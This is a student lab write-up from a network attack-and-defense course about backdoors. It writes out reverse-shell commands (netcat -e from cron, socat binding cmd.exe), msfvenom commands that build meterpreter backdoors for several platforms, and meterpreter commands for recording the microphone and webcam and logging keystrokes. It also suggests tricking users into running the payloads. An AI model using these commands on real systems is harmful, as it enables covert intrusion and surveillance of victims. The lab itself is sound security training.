2017-2018-2 20155303『網絡對抗技術』Exp2:後門原理與實踐

2017-2018-2 『網絡對抗技術』Exp2:後門原理與實踐

————————CONTENTS————————


1. 後門原理與實踐實驗說明及預備知識

1、實驗說明

  • 任務一:使用netcat獲取主機操做Shell,cron啓動 (0.5分)php

  • 任務二:使用socat獲取主機操做Shell, 任務計劃啓動 (0.5分)html

  • 任務三:使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)java

  • 任務四:使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)linux

2、基礎問題回答

  • 問:例舉你能想到的一個後門進入到你係統中的可能方式?
    • 下載軟件時,若是沒有在官網,而是根據搜索引擎的推薦項隨意點開一個連接下載,每每會捆綁下載一些咱們並不須要的軟件。這其中不免會有木馬病毒,從而對電腦安全產生威脅。
  • 問:例舉你知道的後門如何啓動起來(win及linux)的方式?
    • win:修改註冊表、設置爲開機自啓動、誘導用戶點擊從而執行等等。
    • Linux:能夠經過crontab功能將木馬設爲定時啓動,也能夠經過對正常軟件的綁定注入shellcode達到開啓後門的目的。
  • 問:Meterpreter有哪些給你映像深入的功能?
    • 此次試驗給我留下深入印象的主要有獲取目標主機音頻、攝像頭、擊鍵記錄等內容。除此以外還有植入後門實施遠程控制、metsvc後滲透攻擊模塊等等。
  • 問:如何發現本身有系統有沒有被安裝後門?
    • 能夠檢測網絡鏈接,查看是否有IP與本機創建鏈接;安裝專門的殺毒軟件,實時防禦,並按期檢測電腦安全狀況;查看任務計劃程序、開機自啓動項中是否有可疑程序,等等。

返回目錄android


2. 經常使用後門工具

任務一:Windows得到Linux Shell

一、在Windows下使用ipconfig查看本機IP:git

二、使用ncat.exe程序監聽本機的5303端口:web

三、在Kali環境下,使用nc指令的-e選項反向鏈接Windows主機的5303端口:shell

四、成功得到Kali的shell,以下圖所示:編程

任務二:Linux得到Windows Shell

一、在Kali環境中使用ifconfig查看IP:windows

二、使用nc指令監聽5303端口:

三、在Windows下,使用ncat.exe程序的-e選項項反向鏈接Kali主機的5303端口:

四、Kali下能夠看到Windows的命令提示,能夠輸入Windows命令:

任務三:使用nc傳輸數據

一、Windows下監聽5303端口:

二、Kali下鏈接到Windows的5303端口:

三、創建鏈接以後,就能夠傳輸數據了:

返回目錄


3. Meterpreter

任務一:使用netcat獲取主機操做Shell,cron啓動

一、在Windows系統下,監聽5303端口:

二、用crontab -e指令編輯一條定時任務

三、在最後一行添加45 * * * * /bin/netcat 172.16.8.28 5303 -e /bin/sh,意思是在每一個小時的第45分鐘反向鏈接Windows主機的5303端口:

四、當時間到了17點45時,此時已經得到了Kali的shell,能夠輸入指令:

任務二:使用socat獲取主機操做Shell, 任務計劃啓動

  • 預備知識:
    • socatncat的加強版,它使用的格式是socat [options] <address> <address>,其中兩個address是必選項,而options 是可選項。
    • socat的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。
  • 實踐過程:

一、在win10系統下,右擊屏幕左下角windows圖標,選擇「計算機管理」。

在任務計劃程序建立任務,填寫任務名稱,並新建一個觸發器。

二、在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5303 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5303,同時把cmd.exestderr重定向到stdout上:

三、建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:

四、此時,在Kali環境下輸入指令socat - tcp:172.30.4.253:5303,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5215端口,此時能夠發現已經成功得到了一個cmd shell:

任務三:使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

一、輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.4.253 LPORT=5303 -f exe > 20155303_backdoor.exe

生成後門程序:

二、經過nc指令將生成的後門程序傳送到Windows主機上:

三、在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:

四、設置完成後,執行監聽:

五、運行Windows下的後門程序:

六、此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:

任務四:使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容

一、使用record_mic指令能夠截獲一段音頻:

二、使用webcam_snap指令可使用攝像頭進行拍照:

效果以下:

三、使用screenshot指令能夠進行截屏:

效果以下:

四、使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:

返回目錄


4. 實驗中遇到的問題及思考

『問題:Metasploit如何生成各類類型的後門?』

Metasploit能夠生成各類格式的後門。除了本次實驗生成的exe(Windows下的後門),還有Linux環境下的後門、PHP後門、java後門、Android後門,以及shellcode等等。具體如何生成各類類型的後門呢?

一、 Linux下的後門:操做方法與Windows後門相似,輸入msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.30.4.253 LPORT=5303 x> 20155303_backdoor生成木馬。

與windows系統惟一的區別是,在linux下生成的木馬須要經過使用命令chmod +x 程序名賦予可執行的權限。

執行時使用./程序名便可。

二、生成Java後門程序:Java程序在windows下和在linux下均可以生效執行。使用msfvenom -p java/meterpreter/reverse_tcp lhost=172.30.4.253 lport=5303 x> 20155303_backdoor.jar生成木馬。

三、生成PHP後門程序:使用msfvenom -p php/meterpreter/reverse_tcp lhost=172.30.4.253 lport=5303 x> 20155303_backdoor.php生成木馬。

把生成的木馬php文件放到網站上面,當別人訪問的時候就會執行。

四、生成Android後門程序:使用msfvenom -p android/meterpreter/reverse_tcp lhost=172.30.4.253 lport=5303 x> 20155303_backdoor.apk生成木馬。

此時的木馬是apk安裝包形式,誘導用戶點擊此安裝包,就會執行。

五、生成shellcode:使用msfvenom -pwindows/meterpreter/reverse_http lhost=172.30.4.253 lport=5303 -f c生成一段shellcode。

將此shellcode寫入可執行文件,執行時就會回連攻擊機。

返回目錄


5. 實驗總結及體會

  • 經過以前的學習咱們瞭解到,後門就是不通過正常認證流程而訪問系統的通道。攻擊者能夠鏈接這個程序,從而遠程執行各類指令,達到攻擊的目的。這次實驗咱們大體實踐了一遍後門的造成及植入過程,最後還嘗試了對靶機進行控制。雖然內容簡單,但後門的基本原理已在咱們的腦海中留下了一個模糊的輪廓。在從此的學習中,有待進一步深刻研究後門的各類理論知識,以擺脫本實驗中一些基本的束縛條件。
  • 這兩次實驗的難度都不大,且趣味性很強。經過模仿老師教程以及前輩的step by step博客,基本都可以完成實驗。學到這裏,彷彿纔剛剛開始接觸「信息安全」一些關鍵性的內容。而前期課程,好比信息安全系統設計基礎、計算機網絡,以及各類編程知識的重要性也漸漸體現出來。

返回目錄


附:參考資料

相關文章
相關標籤/搜索